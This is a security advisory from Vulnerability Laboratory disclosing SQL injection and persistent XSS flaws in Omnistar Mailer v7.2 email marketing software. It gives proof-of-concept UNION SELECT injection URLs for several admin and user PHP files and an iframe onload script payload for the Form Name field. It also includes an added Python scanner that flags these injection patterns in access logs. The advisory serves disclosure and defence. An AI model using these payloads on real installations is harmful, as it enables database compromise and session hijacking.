Title:
======
Omnistar Mailer v7.2 - Multiple Web Vulnerabilities


Date:
=====
2012-10-01


References:
===========
http://www.vulnerability-lab.com/get_content.php?id=711


VL-ID:
=====
711


Common Vulnerability Scoring System:
====================================
8.5


Introduction:
=============
The Omnistar Mailer software was developed because of the need that was found in the industry to easily manage
email marketing campaigns without having much technical experience. After reviewing feedback from various users
that had used email mailing list managers, it was determined that many of the current solutions that are on the
market are cumbersome and overly complex. Most users of email marketing solutions desire a simple solution where
they can easily add email list campaigns and track the success of them. There are of course many other features
that add value to the products; however, the main function is to send out mass emails and manage the opt-in /
opt-out process. After reviewing the feedback of these users and studying the current solutions on the market,
we developed what we call Omnistar Mailer. We feel our product combines simplicity with a robust set of features
and functions that should meet the needs of most users.

The Omnistar Mailer software is one of the flagship solutions from Omnistar Interactive. Our entire goal when
developing any of our solutions has been to make it so easy to use that any non-technical person can successfully
use the software. Every day we strive to make more and more improvements to the software so that it becomes better
and better. To make this goal a reality, we actively solicit feedback from our customers so that we stay on the
pulse of their needs. It is only through this interactive dialogue that we can implement those features that make
sense to our customers. It is our customers that drive our development process and make sure that our software has
the most desired components and features.

(Copy of the Vendor Homepage: http://www.omnistarmailer.com/company.htm )


Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple Web Vulnerabilities in the Omnistar Mailer v7.2 Email Marketing Software.


Report-Timeline:
================
2012-10-01: Public or Non-Public Disclosure


Status:
========
Published


Affected Products:
==================
Omnistar Interactive
Product: Omnistar Mailer v7.2


Exploitation-Technique:
=======================
Remote


Severity:
=========
Critical


Details:
========
1.1
Multiple SQL Injection vulnerabilities are detected in the Omnistar Mailer v7.2 Email Marketing Software.
The vulnerabilities allow a remote attacker or a local low-privileged user account to execute SQL commands on the
affected application's DBMS. The vulnerabilities are located in the responder, preview, pages, navlinks, contacts,
register and index modules via the bound vulnerable id & form_id parameters. Successful exploitation of the vulnerability
results in DBMS & application compromise. Exploitation requires no user interaction and no privileged user account.


Vulnerable Module(s):
[+] /admin/responder
[+] /admin/preview
[+] /admin/navlinks
[+] /admin/pages
[+] /admin/contacts
[+] /users/index
[+] /users/register

Vulnerable File(s):
[+] /admin/responder.php
[+] /admin/preview.php
[+] /admin/pages.php
[+] /admin/navlinks.php
[+] /admin/contacts.php
[+] /user/register.php
[+] /users/index.php

Vulnerable Parameter(s):
[+] ?op=edit&id=
[+] ?id=
[+] ?form_id=
[+] ?op=edit&nav_id=
[+] ?op=edit&id=16&form_id=
[+] ?op=edit&id=3&form_id=

[+] ?nav_id=
[+] ?profile=1&form_id=
[+] ?form_id=


1.2
A persistent input validation vulnerability is detected in the Omnistar Mailer v7.2 Email Marketing Software.
The bug allows remote attackers to inject malicious script code on the application side (persistent).
The persistent vulnerability is located in the Create Website Forms module via the bound vulnerable Form Name parameter.
Successful exploitation of the vulnerability can lead to session hijacking (manager/admin) or stable (persistent) context manipulation.
Exploitation requires low user interaction and a privileged user account.

Vulnerable Section(s):
[+] Customise Interface -> Create Website Forms

Vulnerable Module(s):
[+] Create Standard Registration Form -> Add form

Vulnerable Parameter(s):
[+] Form Name


Proof of Concept:
=================
1.1
The SQL injection vulnerabilities can be exploited by remote attackers without user interaction. For demonstration or to reproduce ...

PoC:
http://127.0.0.1:1337/mailertest/admin/responder.php?op=edit&id=-37'+Union+Select+version(),2,3--%20-#
http://127.0.0.1:1337/mailer/admin/preview.php?id=-2'+union+Select+1--%20-
http://127.0.0.1:1337/mailer/admin/pages.php?form_id=-2'+Union+Select+version(),2,3--%20-#%20-&op=list
http://127.0.0.1:1337/mailer/admin/navlinks.php?op=edit&nav_id=9''+Union+Select+version(),2,3--%20-#

http://127.0.0.1:1337/mailertest/users/register.php?nav_id=-18'+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16--%20-
http://127.0.0.1:1337/mailertest/admin/pages.php?op=edit&id=16&form_id=2'
http://127.0.0.1:1337/mailertest/admin/contacts.php?op=edit&id=3&form_id=2'
http://127.0.0.1:1337/mailertest/users/index.php?profile=1&form_id=2'
http://127.0.0.1:1337/mailertest/users/register.php?form_id=2'

--- SQL Exception ---
SQL error (You have an error in your SQL syntax;
check the manual that corresponds to your MySQL server version for the right syntax to use near ''9''' at line 3)
in (
select navname,form_id,auto_subscribe,approve_members,confirm_email,signup_redirect,email_forward
from mailer75_navlinks
where nav_id='9''
)
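As a defensive complement to the PoC above, the following added example (not part of the original advisory) scans web-server access-log lines for requests to the Omnistar Mailer modules listed in 1.1 whose id, form_id or nav_id parameter carries the injection markers visible in the PoC URLs (a stray quote, a UNION SELECT, or a trailing "-- " comment). The log lines, client addresses and request timestamps are constructed for this example.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Modules (Vulnerable File(s) in 1.1) and parameters named in the advisory.
WATCHED_PATHS = re.compile(
    r"/(admin/(responder|preview|pages|navlinks|contacts)|users?/(index|register))\.php$")
WATCHED_PARAMS = {"id", "form_id", "nav_id"}
# Markers of the PoC pattern: a quote breaking out of the quoted literal,
# a UNION SELECT, or a trailing "-- " comment that swallows the rest of the query.
SQLI_MARKERS = re.compile(r"'|\bunion\s+select\b|--(\s|$)", re.IGNORECASE)
# Request line of a Combined Log Format entry.
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')


def inspect_request(target):
    """Return [(param, decoded_value), ...] for suspicious watched params, else []."""
    parts = urlsplit(target)  # drops any '#...' fragment, as a browser would
    if not WATCHED_PATHS.search(parts.path):
        return []
    hits = []
    # parse_qs percent-decodes values and turns '+' into spaces, so each value is
    # what the PHP script would have received in $_GET.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        if name in WATCHED_PARAMS:
            hits.extend((name, v) for v in values if SQLI_MARKERS.search(v))
    return hits


def scan_log(lines):
    """Return [(line_no, path, hits), ...] for log lines carrying injection markers."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = LOG_RE.search(line)
        if m:
            hits = inspect_request(m.group("target"))
            if hits:
                findings.append((n, urlsplit(m.group("target")).path, hits))
    return findings


# Constructed sample log (not real traffic), modelled on the advisory's PoC URLs.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Oct/2012:10:00:01 +0000] "GET /mailertest/admin/responder.php?op=edit&id=37 HTTP/1.1" 200 4120',
    '10.0.0.9 - - [01/Oct/2012:10:00:07 +0000] "GET /mailertest/admin/responder.php?op=edit&id=-37\'+Union+Select+version(),2,3--%20- HTTP/1.1" 200 4300',
    '10.0.0.9 - - [01/Oct/2012:10:00:09 +0000] "GET /mailer/admin/navlinks.php?op=edit&nav_id=9\'\' HTTP/1.1" 500 812',
    '10.0.0.9 - - [01/Oct/2012:10:00:12 +0000] "GET /mailertest/users/register.php?form_id=2\' HTTP/1.1" 500 790',
    '10.0.0.5 - - [01/Oct/2012:10:00:20 +0000] "GET /mailertest/index.php?id=1\' HTTP/1.1" 404 210',
]

if __name__ == "__main__":
    for line_no, path, hits in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {path} -> {hits}")
```

The last sample line shows the path filter at work: a quote in an unrelated script's id parameter is not reported, so the check stays scoped to the modules this advisory names.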


1.2
The persistent input validation vulnerability can be exploited by remote attackers with low required user interaction and a
low-privileged user account. For demonstration or to reproduce ...

The attacker creates a form and inserts malicious JavaScript or HTML code in the "Form Name" field.
To create the form, the attacker goes to
Customise Interface -> Create Website Forms -> Create Standard Registration Form -> Add form
and then injects the malicious script code, e.g. <iframe src=www.vuln-lab.com onload=alert("VL")/>
When a user browses the forms page in the control panel, or when any user tries to register for the website,
the persistently injected script code is executed in the context of the web application.


Risk:
=====
1.1
The security risk of the blind SQL injection vulnerability is estimated as critical.

1.2
The security risk of the persistent input validation vulnerability is estimated as medium(+).


Credits:
========
Vulnerability Laboratory [Research Team] - Ibrahim El-Sayed (the_storm) [storm@vulnerability-lab.com] [iel-sayed.blogspot.com]


Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability and capability for a particular purpose.
Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss
of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such
damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing
limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into
databases or trade with fraud/stolen material.

Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission.

Copyright © 2012 | Vulnerability Laboratory


--
VULNERABILITY RESEARCH LABORATORY
LABORATORY RESEARCH TEAM
CONTACT: research@vulnerability-lab.com